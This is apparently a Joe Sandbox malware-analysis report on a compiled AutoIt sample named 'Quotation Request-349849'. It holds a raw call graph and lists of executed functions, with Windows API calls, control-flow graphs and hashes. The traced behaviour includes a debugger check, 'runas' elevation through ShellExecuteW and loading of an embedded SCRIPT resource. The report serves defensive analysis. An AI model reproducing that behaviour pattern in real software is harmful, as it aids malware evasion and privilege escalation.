103341->103327 103343 80e4d2 103342->103343 103344 7f0db6 Mailbox 59 API calls 103343->103344 103351 80e506 103344->103351 103347 7f0db6 Mailbox 59 API calls 103345->103347 103349 7d6bcf 103347->103349 103348 7d3bbb 103348->102981 103348->103004 103350 7d522e 59 API calls 103349->103350 103378 7d6bda Mailbox __wsetenvp 103350->103378 103352 7d750f 59 API calls 103351->103352 103384 80e54f Mailbox 103352->103384 103353 7d6ce7 103417 7d5c6f 103353->103417 103356 80e740 103428 8372df 59 API calls Mailbox 103356->103428 103360 80e762 103364 80e7d9 103432 82f7a1 89 API calls 4 library calls 103364->103432 103400 7d57d4 103368->103400 103369 80e7f2 103369->103353 103370 7d750f 59 API calls 103370->103384 103372 80e7d1 103431 82f5f7 59 API calls 4 library calls 103372->103431 103374 7d7de1 59 API calls 103374->103378 103378->103353 103378->103364 103378->103372 103378->103374 103410 7d586d 67 API calls _wcscpy 103378->103410 103411 7d6f5d GetStringTypeW 103378->103411 103412 7d6ecc 60 API calls __wcsnicmp 103378->103412 103413 7d6faa GetStringTypeW __wsetenvp 103378->103413 103414 7f363d GetStringTypeW _iswctype 103378->103414 103415 7d68dc 165 API calls 3 library calls 103378->103415 103416 7d7213 59 API calls Mailbox 103378->103416 103379 7d7de1 59 API calls 103379->103384 103382 80e792 103430 82f7a1 89 API calls 4 library calls 103382->103430 103384->103356 103384->103370 103384->103379 103384->103382 103424 82f73d 59 API calls 2 library calls 103384->103424 103425 82f65e 61 API calls 2 library calls 103384->103425 103426 83737f 59 API calls Mailbox 103384->103426 103427 7d7213 59 API calls Mailbox 103384->103427 103386 80e7ab 103390 7d7370 103389->103390 103393 7d741e 103389->103393 103392 7f0db6 Mailbox 59 API calls 103390->103392 103394 7d73a2 103390->103394 103391 7f0db6 59 API calls Mailbox 103391->103394 103392->103394 103393->103274 103394->103391 103394->103393 103395->103273 103396->103274 103397->103274 103398->103274 103399->103279 103401 7d5c6f CloseHandle 103400->103401 103402 7d57dc Mailbox 103401->103402 103403 7d5c6f CloseHandle 103402->103403 103404 7d57eb 103403->103404 103404->103348 103405->103301 103406->103304 103407->103312 103408->103333 103409->103311 103410->103378 103411->103378 103412->103378 103413->103378 103414->103378 103415->103378 103416->103378 103418 7d5c79 103417->103418 103419 7d5c88 103417->103419 103419->103418 103421->103302 103422->103308 103423->103336 103424->103384 103425->103384 103426->103384 103427->103384 103428->103360 103430->103386 103431->103364 103432->103369 103476 7d1066 103481 7df76f 103476->103481 103478 7d106c 103479 7f2d40 __cinit 67 API calls 103478->103479 103480 7d1076 103479->103480 103482 7df790 103481->103482 103514 7eff03 103482->103514 103486 7df7d7 103487 7d7667 59 API calls 103486->103487 103488 7df7e1 103487->103488 103489 7d7667 59 API calls 103488->103489 103490 7df7eb 103489->103490 103491 7d7667 59 API calls 103490->103491 103492 7df7f5 103491->103492 103493 7d7667 59 API calls 103492->103493 103494 7df833 103493->103494 103495 7d7667 59 API calls 103494->103495 103496 7df8fe 103495->103496 103524 7e5f87 103496->103524 103500 7df930 103501 7d7667 59 API calls 103500->103501 103502 7df93a 103501->103502 103552 7efd9e 103502->103552 103504 7df981 103505 7df991 GetStdHandle 103504->103505 103506 7df9dd 103505->103506 103507 8145ab 103505->103507 103508 7df9e5 OleInitialize 103506->103508 103507->103506 103509 8145b4 103507->103509 103508->103478 103559 836b38 64 API calls Mailbox 103509->103559 103511 8145bb 103560 837207 CreateThread 103511->103560 103513 8145c7 CloseHandle 103513->103508 103561 7effdc 103514->103561 103517 7effdc 59 API calls 103518 7eff45 103517->103518 103519 7d7667 59 API calls 103518->103519 103520 7eff51 103519->103520 103521 7d7bcc 59 API calls 103520->103521 103522 7df796 103521->103522 103523 7f0162 6 API calls 103522->103523 103523->103486 103525 7d7667 59 API calls 103524->103525 103526 7e5f97 103525->103526 103527 7d7667 59 API calls 103526->103527 103528 7e5f9f 103527->103528 103568 7e5a9d 103528->103568 103531 7e5a9d 59 API calls 103532 7e5faf 103531->103532 103533 7d7667 59 API calls 103532->103533 103534 7e5fba 103533->103534 103535 7f0db6 Mailbox 59 API calls 103534->103535 103536 7df908 103535->103536 103537 7e60f9 103536->103537 103538 7e6107 103537->103538 103539 7d7667 59 API calls 103538->103539 103540 7e6112 103539->103540 103541 7d7667 59 API calls 103540->103541 103542 7e611d 103541->103542 103543 7d7667 59 API calls 103542->103543 103544 7e6128 103543->103544 103545 7d7667 59 API calls 103544->103545 103546 7e6133 103545->103546 103547 7e5a9d 59 API calls 103546->103547 103548 7e613e 103547->103548 103549 7f0db6 Mailbox 59 API calls 103548->103549 103550 7e6145 RegisterWindowMessageW 103549->103550 103550->103500 103553 7efdae 103552->103553 103554 82576f 103552->103554 103555 7f0db6 Mailbox 59 API calls 103553->103555 103571 839ae7 60 API calls 103554->103571 103558 7efdb6 103555->103558 103557 82577a 103558->103504 103559->103511 103560->103513 103572 8371ed 65 API calls 103560->103572 103562 7d7667 59 API calls 103561->103562 103563 7effe7 103562->103563 103564 7d7667 59 API calls 103563->103564 103565 7effef 103564->103565 103566 7d7667 59 API calls 103565->103566 103567 7eff3b 103566->103567 103567->103517 103569 7d7667 59 API calls 103568->103569 103570 7e5aa5 103569->103570 103570->103531 103571->103557 103573 7d1016 103578 7d4974 103573->103578 103576 7f2d40 __cinit 67 API calls 103577 7d1025 103576->103577 103579 7f0db6 Mailbox 59 API calls 103578->103579 103580 7d497c 103579->103580 103581 7d101b 103580->103581 103585 7d4936 103580->103585 103581->103576 103586 7d493f 103585->103586 103587 7d4951 103585->103587 103588 7f2d40 __cinit 67 API calls 103586->103588 103589 7d49a0 103587->103589 103588->103587 103590 7d7667 59 API calls 103589->103590 103591 7d49b8 GetVersionExW 103590->103591 103592 7d7bcc 59 API calls 103591->103592 103593 7d49fb 103592->103593 103594 7d7d2c 59 API calls 103593->103594 103597 7d4a28 103593->103597 103595 7d4a1c 103594->103595 103596 7d7726 59 API calls 103595->103596 103596->103597 103598 80d864 103597->103598 103599 7d4a93 GetCurrentProcess IsWow64Process 103597->103599 103600 7d4aac 103599->103600 103601 7d4b2b GetSystemInfo 103600->103601 103602 7d4ac2 103600->103602 103604 7d4af8 103601->103604 103613 7d4b37 103602->103613 103604->103581 103606 7d4b1f GetSystemInfo 103609 7d4ae9 103606->103609 103607 7d4ad4 103608 7d4b37 2 API calls 103607->103608 103610 7d4adc GetNativeSystemInfo 103608->103610 103609->103604 103611 7d4aef FreeLibrary 103609->103611 103610->103609 103611->103604 103614 7d4ad0 103613->103614 103615 7d4b40 LoadLibraryA 103613->103615 103614->103606 103614->103607 103615->103614 103616 7d4b51 GetProcAddress 103615->103616 103616->103614 103617 80fdfc 103621 7dab30 Mailbox _memmove 103617->103621 103619 82617e Mailbox 59 API calls 103642 7da057 103619->103642 103620 7d9c90 Mailbox 59 API calls 103620->103621 103621->103620 103639 7d7de1 59 API calls 103621->103639 103641 7d9f37 Mailbox 103621->103641 103621->103642 103647 84bc6b 341 API calls 103621->103647 103649 7f0db6 59 API calls Mailbox 103621->103649 103650 7db2b6 103621->103650 103651 7d9ea0 341 API calls 103621->103651 103653 81086a 103621->103653 103655 810878 103621->103655 103657 81085c 103621->103657 103658 7db21c 103621->103658 103661 826e8f 59 API calls 103621->103661 103663 7db525 103621->103663 103666 84df23 103621->103666 103669 838715 103621->103669 103673 84c2e0 103621->103673 103705 837956 103621->103705 103711 82617e 103621->103711 103717 84c193 85 API calls 2 library calls 103621->103717 103624 7f0db6 59 API calls Mailbox 103624->103641 103625 810055 103718 839e4a 89 API calls 4 library calls 103625->103718 103628 7db475 103633 7d8047 59 API calls 103628->103633 103630 810064 103633->103642 103634 7db47a 103634->103625 103645 8109e5 103634->103645 103636 7d8047 59 API calls 103636->103641 103637 7d7667 59 API calls 103637->103641 103638 826e8f 59 API calls 103638->103641 103639->103621 103640 7f2d40 67 API calls __cinit 103640->103641 103641->103624 103641->103625 103641->103628 103641->103634 103641->103636 103641->103637 103641->103638 103641->103640 103641->103642 103643 8109d6 103641->103643 103646 7da55a 103641->103646 103714 7dc8c0 341 API calls 2 library calls 103641->103714 103715 7db900 60 API calls Mailbox 103641->103715 103722 839e4a 89 API calls 4 library calls 103643->103722 103723 839e4a 89 API calls 4 library calls 103645->103723 103721 839e4a 89 API calls 4 library calls 103646->103721 103647->103621 103649->103621 103716 7df6a3 341 API calls 103650->103716 103651->103621 103654 7d9c90 Mailbox 59 API calls 103653->103654 103654->103657 103720 839e4a 89 API calls 4 library calls 103655->103720 103657->103619 103657->103642 103659 7d9d3c 60 API calls 103658->103659 103660 7db22d 103659->103660 103662 7d9d3c 60 API calls 103660->103662 103661->103621 103662->103650 103719 839e4a 89 API calls 4 library calls 103663->103719 103667 84cadd 130 API calls 103666->103667 103668 84df33 103667->103668 103668->103621 103670 838723 103669->103670 103671 83871e 103669->103671 103670->103621 103724 8377b3 103671->103724 103674 7d7667 59 API calls 103673->103674 103675 84c2f4 103674->103675 103676 7d7667 59 API calls 103675->103676 103677 84c2fc 103676->103677 103678 7d7667 59 API calls 103677->103678 103679 84c304 103678->103679 103680 7d9837 84 API calls 103679->103680 103692 84c312 103680->103692 103681 7d7924 59 API calls 103681->103692 103682 7d7bcc 59 API calls 103682->103692 103683 84c528 Mailbox 103683->103621 103684 84c4e2 103686 7d7cab 59 API calls 103684->103686 103689 84c4ef 103686->103689 103687 84c4fd 103690 7d7cab 59 API calls 103687->103690 103688 7d8047 59 API calls 103688->103692 103691 7d7b2e 59 API calls 103689->103691 103693 84c50c 103690->103693 103695 84c4fb 103691->103695 103692->103681 103692->103682 103692->103683 103692->103684 103692->103687 103692->103688 103694 7d7e4f 59 API calls 103692->103694 103692->103695 103697 7d7e4f 59 API calls 103692->103697 103702 7d9837 84 API calls 103692->103702 103703 7d7cab 59 API calls 103692->103703 103704 7d7b2e 59 API calls 103692->103704 103696 7d7b2e 59 API calls 103693->103696 103698 84c3a9 CharUpperBuffW 103694->103698 103695->103683 103749 7d9a3c 59 API calls Mailbox 103695->103749 103696->103695 103699 84c469 CharUpperBuffW 103697->103699 103747 7d843a 68 API calls 103698->103747 103748 7dc5a7 69 API calls 2 library calls 103699->103748 103702->103692 103703->103692 103704->103692 103706 837962 103705->103706 103707 7f0db6 Mailbox 59 API calls 103706->103707 103708 837970 103707->103708 103709 83797e 103708->103709 103710 7d7667 59 API calls 103708->103710 103709->103621 103710->103709 103750 8260c0 103711->103750 103713 82618c 103713->103621 103714->103641 103715->103641 103716->103663 103717->103621 103718->103630 103719->103657 103720->103657 103721->103642 103722->103645 103723->103642 103725 8378ea 103724->103725 103726 8377ca 103724->103726 103725->103670 103727 8377e2 103726->103727 103728 837821 103726->103728 103730 83780a 103726->103730 103727->103730 103731 8377f2 103727->103731 103735 7f0db6 Mailbox 59 API calls 103728->103735 103743 83783e 103728->103743 103729 7f0db6 Mailbox 59 API calls 103734 837800 Mailbox _memmove 103729->103734 103730->103729 103738 7f0db6 Mailbox 59 API calls 103731->103738 103732 837877 103737 7f0db6 Mailbox 59 API calls 103732->103737 103733 837869 103736 7f0db6 Mailbox 59 API calls 103733->103736 103740 7f0db6 Mailbox 59 API calls 103734->103740 103735->103743 103736->103734 103739 83787d 103737->103739 103738->103734 103745 83746b 59 API calls Mailbox 103739->103745 103740->103725 103742 837889 103746 7d5a15 61 API calls Mailbox 103742->103746 103743->103732 103743->103733 103743->103734 103745->103742 103746->103734 103747->103692 103748->103692 103749->103683 103751 8260e8 103750->103751 103752 8260cb 103750->103752 103751->103713 103752->103751 103754 8260ab 59 API calls Mailbox 103752->103754 103754->103752 103755 7d3633 103756 7d366a 103755->103756 103757 7d3688 103756->103757 103758 7d36e7 103756->103758 103796 7d36e5 103756->103796 103759 7d374b PostQuitMessage 103757->103759 103760 7d3695 103757->103760 103762 7d36ed 103758->103762 103763 80d0cc 103758->103763 103787 7d36d8 103759->103787 103767 80d154 103760->103767 103768 7d36a0 103760->103768 103761 7d36ca DefWindowProcW 103761->103787 103764 7d3715 SetTimer RegisterWindowMessageW 103762->103764 103765 7d36f2 103762->103765 103810 7e1070 10 API calls Mailbox 103763->103810 103772 7d373e CreatePopupMenu 103764->103772 103764->103787 103769 7d36f9 KillTimer 103765->103769 103770 80d06f 103765->103770 103815 832527 71 API calls _memset 103767->103815 103773 7d36a8 103768->103773 103774 7d3755 103768->103774 103807 7d443a Shell_NotifyIconW _memset 103769->103807 103780 80d074 103770->103780 103781 80d0a8 MoveWindow 103770->103781 103771 80d0f3 103811 7e1093 341 API calls Mailbox 103771->103811 103772->103787 103778 7d36b3 103773->103778 103783 80d139 103773->103783 103800 7d44a0 103774->103800 103784 7d36be 103778->103784 103785 80d124 103778->103785 103788 80d097 SetFocus 103780->103788 103789 80d078 103780->103789 103781->103787 103782 7d370c 103808 7d3114 DeleteObject DestroyWindow Mailbox 103782->103808 103783->103761 103814 827c36 59 API calls Mailbox 103783->103814 103784->103761 103812 7d443a Shell_NotifyIconW _memset 103784->103812 103813 832d36 81 API calls _memset 103785->103813 103786 80d166 103786->103761 103786->103787 103788->103787 103789->103784 103793 80d081 103789->103793 103809 7e1070 10 API calls Mailbox 103793->103809 103795 80d134 103795->103787 103796->103761 103798 80d118 103799 7d434a 68 API calls 103798->103799 103799->103796 103801 7d4539 103800->103801 103802 7d44b7 _memset 103800->103802 103801->103787 103803 7d407c 61 API calls 103802->103803 103806 7d44de 103803->103806 103804 7d4522 KillTimer SetTimer 103804->103801 103805 80d4ab Shell_NotifyIconW 103805->103804 103806->103804 103806->103805 103807->103782 103808->103787 103809->103787 103810->103771 103811->103784 103812->103798 103813->103795 103814->103796 103815->103786 103816 838d0d 103817 838d20 103816->103817 103818 838d1a 103816->103818 103820 838d31 103817->103820 103821 7f2d55 _free 58 API calls 103817->103821 103819 7f2d55 _free 58 API calls 103818->103819 103819->103817 103822 838d43 103820->103822 103823 7f2d55 _free 58 API calls 103820->103823 103821->103820 103823->103822 103824 81416f 103828 825fe6 103824->103828 103826 81417a 103827 825fe6 85 API calls 103826->103827 103827->103826 103829 826020 103828->103829 103834 825ff3 103828->103834 103829->103826 103830 826022 103840 7d9328 84 API calls Mailbox 103830->103840 103831 826027 103833 7d9837 84 API calls 103831->103833 103835 82602e 103833->103835 103834->103829 103834->103830 103834->103831 103837 82601a 103834->103837 103836 7d7b2e 59 API calls 103835->103836 103836->103829 103839 7d95a0 59 API calls _wcsstr 103837->103839 103839->103829 103840->103831

                                                      Executed Functions

                                                      Function 007D3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B68
                                                      • IsDebuggerPresent.KERNEL32 ref: 007D3B7A
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,008952F8,008952E0,?,?), ref: 007D3BEB
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                        • Part of subcall function 007E092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007D3C14,008952F8,?,?,?), ref: 007E096E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C6F
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00887770,00000010), ref: 0080D281
                                                      • SetCurrentDirectoryW.KERNEL32(?,008952F8,?,?,?), ref: 0080D2B9
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00884260,008952F8,?,?,?), ref: 0080D33F
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0080D346
                                                        • Part of subcall function 007D3A46: GetSysColorBrush.USER32(0000000F), ref: 007D3A50
                                                        • Part of subcall function 007D3A46: LoadCursorW.USER32(00000000,00007F00), ref: 007D3A5F
                                                        • Part of subcall function 007D3A46: LoadIconW.USER32(00000063), ref: 007D3A76
                                                        • Part of subcall function 007D3A46: LoadIconW.USER32(000000A4), ref: 007D3A88
                                                        • Part of subcall function 007D3A46: LoadIconW.USER32(000000A2), ref: 007D3A9A
                                                        • Part of subcall function 007D3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AC0
                                                        • Part of subcall function 007D3A46: RegisterClassExW.USER32(?), ref: 007D3B16
                                                        • Part of subcall function 007D39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A03
                                                        • Part of subcall function 007D39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A24
                                                        • Part of subcall function 007D39D5: ShowWindow.USER32(00000000,?,?), ref: 007D3A38
                                                        • Part of subcall function 007D39D5: ShowWindow.USER32(00000000,?,?), ref: 007D3A41
                                                        • Part of subcall function 007D434A: _memset.LIBCMT ref: 007D4370
                                                        • Part of subcall function 007D434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D4415
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 0080D279
                                                      • runas, xrefs: 0080D33A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 529118366-3287110873
                                                      • Opcode ID: ed588609b59cb84a228f02326635dd4b4ba3db8f52943c358983124c28d89f9a
                                                      • Instruction ID: 27209713c7721f34f405f246791034ebf87a865135e4764beac76ccb2ce0ef88
                                                      • Opcode Fuzzy Hash: ed588609b59cb84a228f02326635dd4b4ba3db8f52943c358983124c28d89f9a
                                                      • Instruction Fuzzy Hash: 2151E070908248EEDF02BBF4DC099ED7B79FB04710F084067F515A23A2EA785645CB22
                                                      Function 007D49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 996 7d49a0-7d4a00 call 7d7667 GetVersionExW call 7d7bcc 1001 7d4b0b-7d4b0d 996->1001 1002 7d4a06 996->1002 1003 80d767-80d773 1001->1003 1004 7d4a09-7d4a0e 1002->1004 1007 80d774-80d778 1003->1007 1005 7d4a14 1004->1005 1006 7d4b12-7d4b13 1004->1006 1010 7d4a15-7d4a4c call 7d7d2c call 7d7726 1005->1010 1006->1010 1008 80d77a 1007->1008 1009 80d77b-80d787 1007->1009 1008->1009 1009->1007 1011 80d789-80d78e 1009->1011 1019 80d864-80d867 1010->1019 1020 7d4a52-7d4a53 1010->1020 1011->1004 1013 80d794-80d79b 1011->1013 1013->1003 1015 80d79d 1013->1015 1018 80d7a2-80d7a5 1015->1018 1021 80d7ab-80d7c9 1018->1021 1022 7d4a93-7d4aaa GetCurrentProcess IsWow64Process 1018->1022 1023 80d880-80d884 1019->1023 1024 80d869 1019->1024 1020->1018 1025 7d4a59-7d4a64 1020->1025 1021->1022 1026 80d7cf-80d7d5 1021->1026 1032 7d4aac 1022->1032 1033 7d4aaf-7d4ac0 1022->1033 1030 80d886-80d88f 1023->1030 1031 80d86f-80d878 1023->1031 1027 80d86c 1024->1027 1028 7d4a6a-7d4a6c 1025->1028 1029 80d7ea-80d7f0 1025->1029 1034 80d7d7-80d7da 1026->1034 1035 80d7df-80d7e5 1026->1035 1027->1031 1036 80d805-80d811 1028->1036 1037 7d4a72-7d4a75 1028->1037 1038 80d7f2-80d7f5 1029->1038 1039 80d7fa-80d800 1029->1039 1030->1027 1040 80d891-80d894 1030->1040 1031->1023 1032->1033 1041 7d4b2b-7d4b35 GetSystemInfo 1033->1041 1042 7d4ac2-7d4ad2 call 7d4b37 1033->1042 1034->1022 1035->1022 1047 80d813-80d816 1036->1047 1048 80d81b-80d821 1036->1048 1044 80d831-80d834 1037->1044 1045 7d4a7b-7d4a8a 1037->1045 1038->1022 1039->1022 1040->1031 1046 7d4af8-7d4b08 1041->1046 1053 7d4b1f-7d4b29 GetSystemInfo 1042->1053 1054 7d4ad4-7d4ae1 call 7d4b37 1042->1054 1044->1022 1050 80d83a-80d84f 1044->1050 1051 80d826-80d82c 1045->1051 1052 7d4a90 1045->1052 1047->1022 1048->1022 1055 80d851-80d854 1050->1055 1056 80d859-80d85f 1050->1056 1051->1022 1052->1022 1058 7d4ae9-7d4aed 1053->1058 1061 7d4b18-7d4b1d 1054->1061 1062 7d4ae3-7d4ae7 GetNativeSystemInfo 1054->1062 1055->1022 1056->1022 1058->1046 1060 7d4aef-7d4af2 FreeLibrary 1058->1060 1060->1046 1061->1062 1062->1058
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 007D49CD
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • GetCurrentProcess.KERNEL32(?,0085FAEC,00000000,00000000,?), ref: 007D4A9A
                                                      • IsWow64Process.KERNEL32(00000000), ref: 007D4AA1
                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007D4AE7
                                                      • FreeLibrary.KERNEL32(00000000), ref: 007D4AF2
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 007D4B23
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 007D4B2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: 2569a26ec4001b28e89bf13935cca7f02876e8917f598783737f7b6918c7cb50
                                                      • Instruction ID: 0ec9ee20bf538fee004072959ba1c7cf990e89789136799cfc44128ee12ea42d
                                                      • Opcode Fuzzy Hash: 2569a26ec4001b28e89bf13935cca7f02876e8917f598783737f7b6918c7cb50
                                                      • Instruction Fuzzy Hash: 4B9193319897C0DAC731DB68D9545AABFF5BF6A300B448DAED0C693B42D238A508C769
                                                      Function 007D4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1063 7d4e89-7d4ea1 CreateStreamOnHGlobal 1064 7d4ec1-7d4ec6 1063->1064 1065 7d4ea3-7d4eba FindResourceExW 1063->1065 1066 80d933-80d942 LoadResource 1065->1066 1067 7d4ec0 1065->1067 1066->1067 1068 80d948-80d956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 80d95c-80d967 LockResource 1068->1069 1069->1067 1070 80d96d-80d98b 1069->1070 1070->1067
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007D4D8E,?,?,00000000,00000000), ref: 007D4E99
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D4D8E,?,?,00000000,00000000), ref: 007D4EB0
                                                      • LoadResource.KERNEL32(?,00000000,?,?,007D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007D4E2F), ref: 0080D937
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,007D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007D4E2F), ref: 0080D94C
                                                      • LockResource.KERNEL32(007D4D8E,?,?,007D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007D4E2F,00000000), ref: 0080D95F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 03dfafab355795da916a72996181e33ef75dc4757fa4949fa76cf9f31c2be146
                                                      • Instruction ID: 3bc2c9e8e9f10b993ed5f91816e32d242c3d1298084019d8a8d32d73af80fb59
                                                      • Opcode Fuzzy Hash: 03dfafab355795da916a72996181e33ef75dc4757fa4949fa76cf9f31c2be146
                                                      • Instruction Fuzzy Hash: DB117CB5240700BFD7218BA5EC48F677BBAFBC5B12F20426DF506C6290DB75EC008A61
                                                      Function 007DFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID:
                                                      • API String ID: 3964851224-0
                                                      • Opcode ID: 0a14fc05e5645f42af0872380ab8a1d1e5cdd5695db428f19bacc620842f3995
                                                      • Instruction ID: 625a78a7f24ce3b87ef3298e1f3a77abb491ad00d9281196e0035c353a68f69d
                                                      • Opcode Fuzzy Hash: 0a14fc05e5645f42af0872380ab8a1d1e5cdd5695db428f19bacc620842f3995
                                                      • Instruction Fuzzy Hash: 0F924970608381CFD720DF15C484B6AB7E5FF89304F14896DE98A9B352D7B9E885CB92
                                                      Function 0083445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,0080E398), ref: 0083446A
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0083447B
                                                      • FindClose.KERNEL32(00000000), ref: 0083448B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
                                                      • Instruction ID: 6970f719103c1f6b2ca53b0145ec68f189669ca6254b62ac48c56096940615b0
                                                      • Opcode Fuzzy Hash: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
                                                      • Instruction Fuzzy Hash: 8BE0D8724116046752106B38EC0D4E9775CFE45336F100725FA35D21E0E778690096DA
